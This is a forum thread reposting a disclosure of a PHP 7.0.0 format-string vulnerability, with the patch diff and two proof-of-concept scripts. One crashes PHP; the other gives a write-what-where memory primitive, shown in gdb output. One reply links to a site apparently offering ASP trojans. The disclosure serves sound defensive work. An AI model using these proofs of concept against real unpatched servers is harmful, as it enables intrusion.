请选择 进入手机版 | 继续访问电脑版
查看: 21600|回复: 1408

[Other] PHP 7.0.0格式化字符串漏洞

[复制链接]
  • TA的每日心情

    昨天 00:34
  • 签到天数: 1043 天

    [LV.10]以坛为家III

    发表于 2015-12-28 11:19:51 | 显示全部楼层 |阅读模式
    [PHP] 纯文本查看 复制代码
    Overview
    --------------------------------------------
    A fun little format string vulnerability exists in PHP 7.0.0 due to how 
    non-existent class names are handled.  From my limited research I 
    believe this issue is likely exploitable for full code execution (see 
    test script below).  This issue does not appear to be present in 
    previous PHP versions and has been patched in version 7.0.1.  If you 
    build a working exploit, drop me a line, I'd love to see (andrew at 
    jmpesp dot org).  Shout out to the PHP team for fixing this so quickly 
    and for building a great product.  Greetz to my DSU crew.
      
      
      
    Timeline
    --------------------------------------------
    12/11/2015: Discovered
    12/12/2015: Reported to PHP team
    12/13/2015: Patch accepted and committed
    12/17/2015: PHP 7.0.1 released containing patch
    12/22/2015: Publicly disclosed
      
      
      
    Vulnerability/Patch
    --------------------------------------------
    diff -rup php-7.0.0_old/Zend/zend_execute_API.c 
    php-7.0.0_new/Zend/zend_execute_API.c
    --- php-7.0.0_old/Zend/zend_execute_API.c   2015-12-01 07:36:25.000000000 
    -0600
    +++ php-7.0.0_new/Zend/zend_execute_API.c   2015-12-12 12:24:24.999391117 
    -0600
    @@ -218,7 +218,7 @@ static void zend_throw_or_error(int fetc
        zend_vspprintf(&message, 0, format, va);
      
        if (fetch_type & ZEND_FETCH_CLASS_EXCEPTION) {
    -       zend_throw_error(exception_ce, message);
    +       zend_throw_error(exception_ce, "%s", message);
        } else {
            zend_error(E_ERROR, "%s", message);
        }
      
      
      
    Proof of Concept #1 (simple segfault)
    --------------------------------------------
    <?php $name="%n%n%n%n%n"; $name::doSomething(); ?>
      
      
      
    Proof of Concept #2 (write-what-where primitive)
    --------------------------------------------
    andrew@thinkpad /tmp/php-7.0.0_64 % cat /tmp/test.php
    <?php
    ini_set("memory_limit", "4G"); // there's probably a much cleaner way to 
    do this
    $rdx = 0x42424242; // what
    $rax = 0x43434343; // where
    $name = "%" . ($rdx - 8) . "d" . "%d" . "%n" . str_repeat("A", ($rax - 
    34)); // your offsets may differ.
    $name::doSomething();
    ?>
      
    andrew@thinkpad /tmp/php-7.0.0_64 % gdb sapi/cli/php
    GNU gdb (GDB) 7.10
    Copyright (C) 2015 Free Software Foundation, Inc.
    License GPLv3+: GNU GPL version 3 or later 
    <[url]http://gnu.org/licenses/gpl.html[/url]>
    This is free software: you are free to change and redistribute it.
    There is NO WARRANTY, to the extent permitted by law.  Type "show 
    copying"
    and "show warranty" for details.
    This GDB was configured as "x86_64-unknown-linux-gnu".
    Type "show configuration" for configuration details.
    For bug reporting instructions, please see:
    <[url]http://www.gnu.org/software/gdb/bugs/[/url]>.
    Find the GDB manual and other documentation resources online at:
    <[url]http://www.gnu.org/software/gdb/documentation/[/url]>.
    For help, type "help".
    Type "apropos word" to search for commands related to "word"...
    Reading symbols from sapi/cli/php...done.
    (gdb) r /tmp/test.php
    Starting program: /tmp/php-7.0.0_64/sapi/cli/php /tmp/test64.php
    [Thread debugging using libthread_db enabled]
    Using host libthread_db library "/usr/lib/libthread_db.so.1".
      
    Program received signal SIGSEGV, Segmentation fault.
    0x0000000000672935 in xbuf_format_converter 
    (xbuf=xbuf@entry=0x7fffffffa610, is_char=is_char@entry=1 '\001', 
    fmt=<optimized out>, ap=0x7fffffffa658)
         at /tmp/php-7.0.0_64/main/spprintf.c:744
    744                     *(va_arg(ap, int *)) = is_char? (int)((smart_string 
    *)xbuf)->len : (int)ZSTR_LEN(((smart_str *)xbuf)->s);
    (gdb) i r
    rax            0x43434343   1128481603
    rbx            0x7fffb2800016   140736188121110
    rcx            0x6e 110
    rdx            0x42424242   1111638594
    rsi            0x7fffffff9db0   140737488330160
    rdi            0x7fffffffa658   140737488332376
    rbp            0x1  0x1
    rsp            0x7fffffff9d50   0x7fffffff9d50
    r8             0x7fffffff9db0   140737488330160
    r9             0x7fffb2800016   140736188121110
    r10            0x0  0
    r11            0x0  0
    r12            0x20 32
    r13            0x7fffffffa610   140737488332304
    r14            0x0  0
    r15            0x4242423a   1111638586
    rip            0x672935 0x672935 <xbuf_format_converter+1845>
    eflags         0x10202  [ IF RF ]
    cs             0x33 51
    ss             0x2b 43
    ds             0x0  0
    es             0x0  0
    fs             0x0  0
    gs             0x0  0
    (gdb) x/1i $rip
    => 0x672935 <xbuf_format_converter+1845>:  mov    DWORD PTR [rax],edx
    (gdb)
    回复

    使用道具 举报

    该用户从未签到

    发表于 2015-12-28 17:21:01 | 显示全部楼层
    学习学习技术,加油!
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    慵懒
    2016-10-18 11:32
  • 签到天数: 31 天

    [LV.5]常住居民I

    发表于 2015-12-28 20:57:21 | 显示全部楼层
    学习了,谢谢90大哥。
    http://www.asp-muma.com/?post=11
    http://www.asp-muma.com/?post=12
    http://www.asp-muma.com/?post=15
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-12-28 23:59:36 | 显示全部楼层
    支持,看起来不错呢!
    回复 支持 反对

    使用道具 举报

  • TA的每日心情

    2015-10-24 10:52
  • 签到天数: 7 天

    [LV.3]偶尔看看II

    发表于 2015-12-29 11:28:39 | 显示全部楼层
    还是不错的哦,顶了
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-12-29 12:31:48 | 显示全部楼层
    还是不错的哦,顶了
    回复 支持 反对

    使用道具 举报

  • TA的每日心情

    2019-2-12 22:05
  • 签到天数: 2 天

    [LV.1]初来乍到

    发表于 2015-12-29 16:00:41 | 显示全部楼层
    支持,看起来不错呢!
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-12-29 21:47:37 | 显示全部楼层
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-12-29 23:18:23 | 显示全部楼层
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-12-30 05:06:07 | 显示全部楼层
    支持中国红客联盟(ihonker.org)
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    快速回复 返回顶部 返回列表